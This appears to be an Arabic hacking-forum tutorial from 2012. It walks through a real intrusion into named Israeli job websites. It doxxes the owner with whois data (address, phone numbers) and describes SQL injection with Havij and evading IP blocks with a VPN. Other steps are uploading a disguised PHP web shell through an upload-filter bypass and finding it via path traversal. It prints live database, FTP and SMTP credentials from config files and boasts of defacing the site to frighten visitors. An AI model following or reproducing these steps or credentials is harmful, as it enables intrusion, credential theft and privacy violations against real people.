موضوعي التاني بعد الغياب الطويل
خلينا نبلش ونقول
السلام عليكم وكيف الأحوال
بالموضوع السابق ذكرت سبب الغياب
وخلينا بالموضوع
الموضوع مهم ركز معي
ومن العنوان واضح شو الموضوع
يله نبلش عبركت الله
اولا نبدا بالدخول الى موقع who.is مثلا لجمع المعلومات
كود PHP:
query: smartjob.co.il
reg-****: smartjob
domain: smartjob.co.il
descr: Shachar Bialick
descr: Haetzel St.12
descr: Ariel
descr: 44837
descr: Israel
phone: +972 3 5103051
fax-no: +972 3 7250210
e-mail: Shachar AT Techlocks.com
admin-c: LD-SB11242-IL
tech-c: LD-SB11242-IL
zone-c: LD-SB11242-IL
nserver: ns1.virtualbox.co.il
nserver: ns2.virtualbox.co.il
validity: 20-07-2014
status: Transfer Locked
changed: domain-registrar AT isoc.org.il 20100720 (Assigned)
changed: domain-registrar AT isoc.org.il 20101003 (Changed)
changed: domain-registrar AT isoc.org.il 20110726 (Changed)
changed: domain-registrar AT isoc.org.il 20110726 (Changed)
person: Shachar Bialick
address: Haetzel St.12
address: Ariel
address: 44837
address: Israel
phone: +972 52 8000004
fax-no: +972 3 7624553
e-mail: shachar AT internrate.co.il
nic-hdl: LD-SB11242-IL
changed: Managing Registrar 20070509
changed: Managing Registrar 20101003
registrar ****: LiveDns Ltd
registrar info: http://domains.livedns.co.il
% Rights to the data above are restricted by copyrigh
نسحب الايبي و نروح على Bing
الموقع سكربت خاص ..... نجرب نتفحص الموقع و نبحث عن متفيرات لعل نحقنها او نبحث عن ثغرات النكلود مثلا
كود PHP:
http://www.smartjob.co.il/content.php?id=2
www.smartjob.co.il/search.php?pos_type_side_search=3
نضعهم في الهافينج
ملاحضة = معظم السكربتات الخاصة مصابة
كود PHP:
License is valid
Analyzing http://www.smartjob.co.il/search.php?pos_type_side_search=3
Host IP: 62.219.17.248
*** Server: Microsoft-IIS/7.5
Powered-by: PHP/5.2.17
Powered-by: ASP.NET
يا سلام تم الحقن و استخرجنا معلومات الادمينز .
تعالو نبحث عن لوحة التحكم ...
نبحث عن اللوحة نلاقي مكانين
الاول
كود PHP:
https://www.smartjob.co.il/login.php
نجرب ندخل بيه الى احد الباسوردات ... يرفض الدخول
نشوف الثانية
كود PHP:
http://www.smartjob.co.il/admin/
اووبس
ماني فهمان ولا اي شي ........ هي لوحة تحكم جوملا لما يكون الموقع مسكر مثلا .
نجرب
كود PHP:
http://www.smartjob.co.il/admin/administrator
نجرب ندخل بالبيانات المسحوبة من قبل .... لم ننجح البيانات خاطئة
طيب فين لوحة التحكم ؟ ما فيه ؟ يعني شغلنا كله طار
ااااه كم هي صعبم المواقع الخاصة .....
استنى بقى ... في الموقع فيه مكان للتسجل .... ليه ما نسجل و ندخل
لان التسجيل ياخذك لمنطقة خاصة نوعاا ما ... ممكن فيها ثغرة ... او لوحة
بعد التسجيل احنا في اللوحة الخاصة بالمسجلين ..... بس استنى هو شو في ؟
الدنيا ملخبطة ؟ ؟؟ ...... انا على موقع ثاني مو الموقع الاول ؟ ؟؟
كود PHP:
https://www.smarteq.co.il/he-il/applicants/7647966b59/status
انا على ال job و شو جاب teq §§§
اقولكم ..... لما تكون مواقع خاصة ... فانه احتمال كبير ان يستخدمون نفس القاعدة البيانات ... لهذا لما حقنا السكربت الاول smartjob سحبنا معلومات من قاعدة السربت الثاني
smartteq ...لانه ببساطة نفس قاعدة البيانات
و هنا حلينا مشكلة بعض الشباب انه يحقن موقع و مايلقى اللوحة << برايفت و ماتغلى عليكم .
طيب الان بديهي انه اللوحة راح تكون في موقع smarteq.co.il
نفحص الموقع ببرنامج acuntix
و نطلع اللوحة ..... بس استنى
الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟
نفحص بالبرنامج نفسه بس مع بعض الشروط
الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو و نطلع اللوحة ..... بس استنى
الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟
نفحص بالبرنامج نفسه بس مع بعض الشروط
الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو
شايفين في الصورة في اليمين اعلى .... نجد pause و resume ... ههه يعني
كلما يعطينا بلوك نروح للبرنامج و نعمل pause و نروح لل Vpn و نغير اليبي ثم نعود للبرنامج و نعمل resume
و نكمل الفحص حتى نجد اللوحة هذه
كود PHP:
https://www.smarteq.co.il/he-il/site/adminlogin?login=true
نجرب ندخل بالبيانات اللي سحبناها فوق بال الهافينج ..... و النتيجة مبرررررررررروك اللوحة
بس فيه مشكلة شباب ... هو اللغة هي حدي فهمها ؟
هههه حاليا ما لازم نفهمها .. طريقة بسيطة نفس اللي في الصورة
نممر سهم الفارة و نقرا المسار او اللينك .... و نفهم معناه
و نجرب هنا
كود PHP:
https://www.smarteq.co.il/he-il/admin/settings/account
ياسلام ... نجرب نرفع شل مشفر ...... مشان ما يمسكوه الانتي فيروس
application/octet-streamno good
بفففففف ... ماينفعش نرفع ملف php
استنى بقى .... نجرب tamper data
نحول صيغة الشل على جهازي من a.php الى a.jpg
ثم
يا سلام تم الرفع
بس مسار الشل وين ؟؟؟
نجرب نشوف سورس الصفحة
جمييييييييييييييييييل جدااا ... هذا مسار الشل
كود PHP:
https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=6002_a.php&p=26&core=true
ندخل من المنتصفح بففففففففففففففف ... الشل ما شتغل
شو نعمل يا جماعه ؟؟؟
استنى لحظه هو ملف thumbnail.php هو اللي في الرابط ... و يحاول يفتح لنا الشل على انه صورة .... لذلك هدا الخطا
طيب الملفات اترفعت وين ؟
لاحض الرابط فوق و الموقع .... احتمال ثغرة انكلود
نجرب هيك
كود PHP:
https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=../../
ضهر خطا
جميييل
كود PHP:
../../_uploads/images/../
يعني من مجلد classes نرجع مجلدين ... و نصبح في lib و منه نجد مجلدي uploads و images يعني الشل يكون هنا ..
كود PHP:
https://www.smarteq.co.il/lib/_uploads/images/6002_a.php
نجرب .... ياااااااااااااااااااااااااااااسلام ... هذا الشل
*****************************
الان رفعنا الشل ... طيب شو نعمل ؟ ممكن نثبت انفسنا على السيرفر جيداا
او نبحث عن ملفات حساسة
اول الملفات هي ملفات الكونفيغات
و انا اريد قراءة كونفيغ جوملا اللي لقيناه من قيبل
نجرب نبحث من الشل .... انا صراحة ضعيف جدا في سرفرات الوندوز
بس فيه طريقتي الفاشلة هذه
لا حظو المسارهنا
كود PHP:
c:DomainsShaharBsmarteq.co.ilwwwrootlib_uploads
يعني من المفروض مسار الكونفيغ يكون
كود PHP:
c:DomainsShaharBsmartjob.co.ilwwwrootadminconfiguration.php
و هذا الكونفيغ
كود PHP:
<?php
class JConfig {
public $offline = '1';
public $offline_message =
public $site**** = 'SmartJOB';
public $editor = 'tinymce';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'getsmar_cv123';
public $password = 'H5p60v9OfT9n';
public $db = 'getsmar_smartjob';
public $dbprefix = 'jos_';
public $live_site = '';
public $secret = '1phLFwWlgWcTugFj';
public $gzip = '0';
public $error_reporting = '-1';
public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $offset_user = 'UTC';
public $mailer = 'mail';
public $mailfrom = 'admin@smartjob.co.il';
public $from**** = 'SmartJOB';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '×،×™×،××گ';
public $smtppass = '****l100';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $****Desc = '';
public $****Keys = '';
public $****Title = '1';
public $****Author = '1';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $log_path = 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\logs';
public $tmp_path = 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $****Rights = '';
public $site****_pagetitles = '0';
public $force_ssl = '0';
public $feed_email = 'author';
public $******_domain = '';
public $******_path = '';
}
طبعاا شباب دام انها تقريبا قاعدة واحدة ..... يعني اي معلومة راح تكون حساسة جدااااااااااا
و منها
هذا كونيغ ثاني لقيته
كود PHP:
C:DomainsShaharBsmartjob.co.ilwwwrootconfiguration.php
فيه التالي
كود PHP:
public $ftp_host = '62.219.17.236';
public $ftp_port = '21';
public $ftp_user = 'OrZilca';
public $ftp_pass = 'WorkHard50';
public $ftp_root = 'smartjob.co.il/wwwroot/';
public $ftp_enable = '1';
نجرب ندخل ftp
و النتيجة full access على جميع مواقعه
طيب الان الاندكس ..... كلام و صور .... و بعد شوي صاحب الموقع يعدله و خلص
جميلة صح ؟
لا
نهاجم الموقع + نهاجم الزوار ...... نرعبهم ههههههههههه
فيه فلاش بنت كانها شبح وتبلش بالصراخ ..... صراحة انا اعلق في الاندكس و لا اشغله من الرعب ههههههههه
عشان تصبح remote kill index ههههههههههههههههههههههه
نشالله كون توفقت بالشرح
وشكرا لا تنسونا من الدعاء
وفك اسر المعتقلين في سوريا
وتحسين الحال
امين يا الله
ggukh;f :hsji`ht hgsdvtvhj hgohwm , jo'd hgplhdm hg]us hgj'fdr ugn
12-13-2012, 03:45 AM
للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il 
رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il 
العرض العادي
